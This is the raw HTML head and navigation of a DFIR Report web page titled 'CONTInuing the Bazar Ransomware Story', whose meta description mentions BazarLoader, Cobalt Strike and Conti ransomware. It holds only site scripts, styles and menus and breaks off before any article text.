CINXE.COM

<!doctype html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>CONTInuing the Bazar Ransomware Story – The DFIR Report</title> <meta name='robots' content='max-image-preview:large' /> <style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style> <link rel='dns-prefetch' href='//stats.wp.com' /> <link rel='dns-prefetch' href='//c0.wp.com' /> <link rel="alternate" type="application/rss+xml" title="The DFIR Report » Feed" href="https://thedfirreport.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="The DFIR Report » Comments Feed" href="https://thedfirreport.com/comments/feed/" /> <script type="text/javascript"> /* <![CDATA[ */ window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/thedfirreport.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}}; /*! This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); /* ]]> */ </script> <link rel='stylesheet' id='jetpack_related-posts-css' href='https://c0.wp.com/p/jetpack/14.0/modules/related-posts/related-posts.css' type='text/css' media='all' /> <style id='wp-emoji-styles-inline-css' type='text/css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/6.7.1/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='mediaelement-css' href='https://c0.wp.com/c/6.7.1/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='https://c0.wp.com/c/6.7.1/wp-includes/js/mediaelement/wp-mediaelement.min.css' type='text/css' media='all' /> <style id='jetpack-sharing-buttons-style-inline-css' type='text/css'> .jetpack-sharing-buttons__services-list{display:flex;flex-direction:row;flex-wrap:wrap;gap:0;list-style-type:none;margin:5px;padding:0}.jetpack-sharing-buttons__services-list.has-small-icon-size{font-size:12px}.jetpack-sharing-buttons__services-list.has-normal-icon-size{font-size:16px}.jetpack-sharing-buttons__services-list.has-large-icon-size{font-size:24px}.jetpack-sharing-buttons__services-list.has-huge-icon-size{font-size:36px}@media print{.jetpack-sharing-buttons__services-list{display:none!important}}.editor-styles-wrapper .wp-block-jetpack-sharing-buttons{gap:0;padding-inline-start:0}ul.jetpack-sharing-buttons__services-list.has-background{padding:1.25em 2.375em} </style> <style id='classic-theme-styles-inline-css' type='text/css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css' type='text/css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='freenews-style-css' href='https://thedfirreport.com/wp-content/themes/freenews/style.css?ver=6.7.1' type='text/css' media='all' /> <style id='freenews-style-inline-css' type='text/css'> .tags-links, .byline, .comments-link { clip: rect(1px, 1px, 1px, 1px); height: 1px; position: absolute; overflow: hidden; width: 1px; } </style> <link rel='stylesheet' id='font-awesome-css' href='https://thedfirreport.com/wp-content/themes/freenews/assets/library/fontawesome/css/all.min.css?ver=6.7.1' type='text/css' media='all' /> <link rel='stylesheet' id='freenews-google-fonts-css' href='https://thedfirreport.com/wp-content/fonts/d92fef3d9e5de6f7993b11046e265436.css' type='text/css' media='all' /> <link rel='stylesheet' id='sharedaddy-css' href='https://c0.wp.com/p/jetpack/14.0/modules/sharedaddy/sharing.css' type='text/css' media='all' /> <link rel='stylesheet' id='social-logos-css' href='https://c0.wp.com/p/jetpack/14.0/_inc/social-logos/social-logos.min.css' type='text/css' media='all' /> <script type="text/javascript" id="jetpack_related-posts-js-extra"> /* <![CDATA[ */ var related_posts_js_options = {"post_heading":"h4"}; /* ]]> */ </script> <script type="text/javascript" src="https://c0.wp.com/p/jetpack/14.0/_inc/build/related-posts/related-posts.min.js" id="jetpack_related-posts-js"></script> <script type="text/javascript" src="https://c0.wp.com/c/6.7.1/wp-includes/js/jquery/jquery.min.js" id="jquery-core-js"></script> <script type="text/javascript" src="https://c0.wp.com/c/6.7.1/wp-includes/js/jquery/jquery-migrate.min.js" id="jquery-migrate-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/js/global.js?ver=1" id="freenews-global-js"></script> <link rel="https://api.w.org/" href="https://thedfirreport.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://thedfirreport.com/wp-json/wp/v2/posts/4690" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://thedfirreport.com/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.7.1" /> <link rel="canonical" href="https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/" /> <link rel='shortlink' href='https://thedfirreport.com/?p=4690' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://thedfirreport.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthedfirreport.com%2F2021%2F11%2F29%2Fcontinuing-the-bazar-ransomware-story%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://thedfirreport.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthedfirreport.com%2F2021%2F11%2F29%2Fcontinuing-the-bazar-ransomware-story%2F&format=xml" />  <script async src="https://www.googletagmanager.com/gtag/js?id=UA-162747485-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-162747485-1'); </script> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//thedfirreport.com/?wordfence_lh=1&hid=CFD06316AA709D608271209D9C944601'); </script> <style>img#wpstats{display:none}</style> <style type="text/css" id="custom-background-css"> body.custom-background { background-color: #f8f8f8; } </style>  <meta property="og:type" content="article" /> <meta property="og:title" content="CONTInuing the Bazar Ransomware Story" /> <meta property="og:url" content="https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/" /> <meta property="og:description" content="In this report we will discuss a case from early August where we witnessed threat actors utilizing BazarLoader and Cobalt Strike to accomplish their mission of encrypting systems with Conti ransomw…" /> <meta property="article:published_time" content="2021-11-29T02:19:21+00:00" /> <meta property="article:modified_time" content="2021-11-29T12:51:07+00:00" /> <meta property="og:site_name" content="The DFIR Report" /> <meta property="og:image" content="https://thedfirreport.com/wp-content/uploads/2021/11/f22784bc5813874c131d0c6f21acb3404084de7b57c0ae1f2afde6d8fe24c3a2.png" /> <meta property="og:image:width" content="709" /> <meta property="og:image:height" content="373" /> <meta property="og:image:alt" content="" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:text:title" content="CONTInuing the Bazar Ransomware Story" /> <meta name="twitter:image" content="https://thedfirreport.com/wp-content/uploads/2021/11/f22784bc5813874c131d0c6f21acb3404084de7b57c0ae1f2afde6d8fe24c3a2.png?w=640" /> <meta name="twitter:card" content="summary_large_image" />  <link rel="icon" href="https://thedfirreport.com/wp-content/uploads/2020/04/cropped-dfir-v1-w-32x32.png" sizes="32x32" /> <link rel="icon" href="https://thedfirreport.com/wp-content/uploads/2020/04/cropped-dfir-v1-w-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://thedfirreport.com/wp-content/uploads/2020/04/cropped-dfir-v1-w-180x180.png" /> <meta name="msapplication-TileImage" content="https://thedfirreport.com/wp-content/uploads/2020/04/cropped-dfir-v1-w-270x270.png" /> </head> <body class="post-template-default single single-post postid-4690 single-format-standard custom-background has-sidebar tags-hidden author-hidden comment-hidden"> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content">Skip to content</a> <header id="masthead" class="site-header"> <div id="main-header" class="main-header"> <div class="navigation-top"> <div class="wrap"> <div id="site-header-menu" class="site-header-menu"> <nav class="main-navigation" aria-label="Primary Menu" role="navigation"> <button class="menu-toggle" aria-controls="primary-menu" aria-expanded="false"> <span class="toggle-text">Menu</span> <span class="toggle-bar"></span> </button> <ul id="primary-menu" class="menu nav-menu"><li id="menu-item-21337" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-21337"><a href="https://thedfirreport.com/">Reports</a></li> <li id="menu-item-21314" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21314"><a href="https://thedfirreport.com/analysts/">Analysts</a></li> <li id="menu-item-21315" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21315"><a href="https://thedfirreport.com/services/">Services</a> <ul class="sub-menu"> <li id="menu-item-21319" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21319"><a href="https://thedfirreport.com/services/threat-intelligence/">Threat Intelligence</a></li> <li id="menu-item-21318" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21318"><a href="https://thedfirreport.com/services/detection-rules/">Detection Rules</a></li> <li id="menu-item-31055" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-31055"><a href="https://thedfirreport.com/services/dfir-labs/">DFIR Labs</a> <ul class="sub-menu"> <li id="menu-item-35456" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-35456"><a href="https://thedfirreport.com/services/dfir-labs/ctf/">Capture The Flag (CTF)</a></li> <li id="menu-item-32606" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32606"><a href="https://thedfirreport.com/services/dfir-labs/dfir-labs-leaderboard/">Leaderboard</a></li> <li id="menu-item-38108" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38108"><a href="https://thedfirreport.com/services/dfir-labs/ctf-winners/">CTF Winners</a></li> </ul> </li> <li id="menu-item-21320" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21320"><a href="https://thedfirreport.com/services/case-artifacts/">Case Artifacts</a></li> <li id="menu-item-21317" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21317"><a href="https://thedfirreport.com/services/mentoring-coaching-program/">Mentoring & Coaching Program</a> <ul class="sub-menu"> <li id="menu-item-21325" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21325"><a href="https://thedfirreport.com/services/mentoring-coaching-program/book-a-session/">Book A Session</a></li> <li id="menu-item-21326" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21326"><a href="https://thedfirreport.com/services/mentoring-coaching-program/meet-the-team/">Meet The Team</a></li> </ul> </li> </ul> </li> <li id="menu-item-31033" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-31033"><a href="https://store.thedfirreport.com/collections/dfir-labs">Access DFIR Labs</a></li> <li id="menu-item-21313" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21313"><a href="https://thedfirreport.com/subscribe/">Subscribe</a></li> <li id="menu-item-21316" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21316"><a href="https://thedfirreport.com/contact/">Contact Us</a></li> </ul> </nav> </div> </div> </div> <nav class="secondary-navigation" role="navigation" aria-label="Secondary Navigation"> <div class="wrap"> <button class="secondary-menu-toggle" aria-controls="primary-menu" aria-expanded="false"> <span class="secondary-toggle-text">Menu</span> <span class="secondary-toggle-bar"></span> </button> <ul id="primary-menu" class="secondary-menu"><li id="menu-item-21323" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21323"><a href="https://thedfirreport.com/services/threat-intelligence/">Threat Intelligence</a></li> <li id="menu-item-21322" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21322"><a href="https://thedfirreport.com/services/detection-rules/">Detection Rules</a></li> <li id="menu-item-31037" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-31037"><a href="https://thedfirreport.com/services/dfir-labs/">DFIR Labs</a> <ul class="sub-menu"> <li id="menu-item-35457" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-35457"><a href="https://thedfirreport.com/services/dfir-labs/ctf/">Capture The Flag (CTF)</a></li> <li id="menu-item-32608" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32608"><a href="https://thedfirreport.com/services/dfir-labs/dfir-labs-leaderboard/">Leaderboard</a></li> <li id="menu-item-38110" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38110"><a href="https://thedfirreport.com/services/dfir-labs/ctf-winners/">CTF Winners</a></li> </ul> </li> <li id="menu-item-21321" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21321"><a href="https://thedfirreport.com/services/mentoring-coaching-program/">Mentoring & Coaching Program</a> <ul class="sub-menu"> <li id="menu-item-21327" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21327"><a href="https://thedfirreport.com/services/mentoring-coaching-program/book-a-session/">Book A Session</a></li> <li id="menu-item-21328" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21328"><a href="https://thedfirreport.com/services/mentoring-coaching-program/meet-the-team/">Meet The Team</a></li> </ul> </li> <li id="menu-item-21324" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21324"><a href="https://thedfirreport.com/services/case-artifacts/">Case Artifacts</a></li> </ul> </div> </nav> <div class="main-header-brand"> <div class="header-brand"> <div class="wrap"> <div class="header-brand-content"> <div class="site-branding"> <div class="site-branding-text"> <p class="site-title"><a href="https://thedfirreport.com/" rel="home">The DFIR Report</a></p> <p class="site-description">Real Intrusions by Real Attackers, The Truth Behind the Intrusion</p> </div> </div> <div class="header-right"> <div class="header-banner"> </div> </div> </div> </div> </div> <div id="nav-sticker"> <div class="navigation-top"> <div class="wrap"> <div id="site-header-menu" class="site-header-menu"> <nav id="site-navigation" class="main-navigation" aria-label="Primary Menu"> <button class="menu-toggle" aria-controls="primary-menu" aria-expanded="false"> <span class="toggle-text">Menu</span> <span class="toggle-bar"></span> </button> <ul id="primary-menu" class="menu nav-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-21337"><a href="https://thedfirreport.com/">Reports</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21314"><a href="https://thedfirreport.com/analysts/">Analysts</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21315"><a href="https://thedfirreport.com/services/">Services</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21319"><a href="https://thedfirreport.com/services/threat-intelligence/">Threat Intelligence</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21318"><a href="https://thedfirreport.com/services/detection-rules/">Detection Rules</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-31055"><a href="https://thedfirreport.com/services/dfir-labs/">DFIR Labs</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-35456"><a href="https://thedfirreport.com/services/dfir-labs/ctf/">Capture The Flag (CTF)</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32606"><a href="https://thedfirreport.com/services/dfir-labs/dfir-labs-leaderboard/">Leaderboard</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38108"><a href="https://thedfirreport.com/services/dfir-labs/ctf-winners/">CTF Winners</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21320"><a href="https://thedfirreport.com/services/case-artifacts/">Case Artifacts</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21317"><a href="https://thedfirreport.com/services/mentoring-coaching-program/">Mentoring & Coaching Program</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21325"><a href="https://thedfirreport.com/services/mentoring-coaching-program/book-a-session/">Book A Session</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21326"><a href="https://thedfirreport.com/services/mentoring-coaching-program/meet-the-team/">Meet The Team</a></li> </ul> </li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-31033"><a href="https://store.thedfirreport.com/collections/dfir-labs">Access DFIR Labs</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21313"><a href="https://thedfirreport.com/subscribe/">Subscribe</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21316"><a href="https://thedfirreport.com/contact/">Contact Us</a></li> </ul> </nav> </div> </div> </div> <div class="clock"> <div id="time"></div> <div id="date">Sunday, December 01, 2024</div> </div> </div> <nav class="secondary-navigation" role="navigation" aria-label="Secondary Navigation"> <div class="wrap"> <button class="secondary-menu-toggle" aria-controls="primary-menu" aria-expanded="false"> <span class="secondary-toggle-text">Menu</span> <span class="secondary-toggle-bar"></span> </button> <ul id="primary-menu" class="secondary-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21323"><a 